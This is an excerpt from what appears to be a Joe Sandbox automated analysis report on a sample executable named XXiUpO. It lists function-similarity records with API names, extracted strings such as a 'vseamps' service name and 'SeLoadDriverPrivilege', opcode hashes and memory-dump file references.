                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                  • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                  • API String ID: 3408796845-4213300970
                                  • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                  • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                  • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                  • String ID: ampStopSingletone: logging ended
                                  • API String ID: 2048888615-3533855269
                                  • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                  • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                  • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                  • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                  • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                  • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ErrorLastManagerOpen$FileModuleName
                                  • String ID: /remove$/service$vseamps
                                  • API String ID: 67513587-3839141145
                                  • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                  • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                  • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                  • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                  • GetProcAddress.KERNEL32 ref: 000000014000F117
                                    • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: AddressProc$Load$Library
                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                  • API String ID: 3981747205-232180764
                                  • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                  • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                  • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                  • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                  • String ID:
                                  • API String ID: 4284112124-0
                                  • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                  • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                  • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                  • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                  • String ID: vseamps
                                  • API String ID: 3693165506-3944098904
                                  • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                  • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                  • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                  • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: FileModuleName
                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                  • API String ID: 514040917-4022980321
                                  • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                  • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                  • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                  • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 2057259594-0
                                  • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                  • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                  • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                  • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                  • String ID:
                                  • API String ID: 3103264659-0
                                  • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                  • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                  • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                  • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                  • Instruction ID: 920146e44e3eb67772224f925f4574f1df27eb49a7c5d82b7e72d67329033203
                                  • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                  • Instruction Fuzzy Hash: B331B27270AB818AEB608F61E8507EE7365FB84394F40443ADA4E43B86DF3CD658C718
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 1269745586-0
                                  • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                  • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                  • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                  • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                  • Instruction ID: 01f0453d165f142292b8cbe9ba8441079c1886ad588176c23ae87e750421d75c
                                  • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                  • Instruction Fuzzy Hash: 5D31A432709B8189DB60CF25E8507AE73A4FB857A4F500536EA9D43B56DF3CD165CB08
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                  • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                  • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                  • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                  APIs
                                  • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                  • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                  • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                  • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                  • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContext
                                  • String ID:
                                  • API String ID: 2202868296-0
                                  • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                  • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                  • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                  • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise_clrfp
                                  • String ID:
                                  • API String ID: 15204871-0
                                  • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                  • Instruction ID: a5dba0fed5fa911e440f18767e80e14b021584f8153e4d27570a50d8cc3198a2
                                  • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                  • Instruction Fuzzy Hash: 93B15873605B898FEB15CF29C89636C3BA0F744B98F148921DA5E877A5CB39D461C708
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 203985260-0
                                  • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                  • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                  • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                  • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                  • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                  • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                  • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                  • Instruction ID: b9e07d66be50be92b93882c4329107fa2510e5679bc22d0c3a88855ee128ea44
                                  • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                  • Instruction Fuzzy Hash: 3C51D222B0978185FB209B76A8542AA7BA4FB40BE4F144134EE5C37B9ACF3CD421D70C
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: EntryFunctionLookup
                                  • String ID:
                                  • API String ID: 3852435196-0
                                  • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                  • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                  • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                  • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
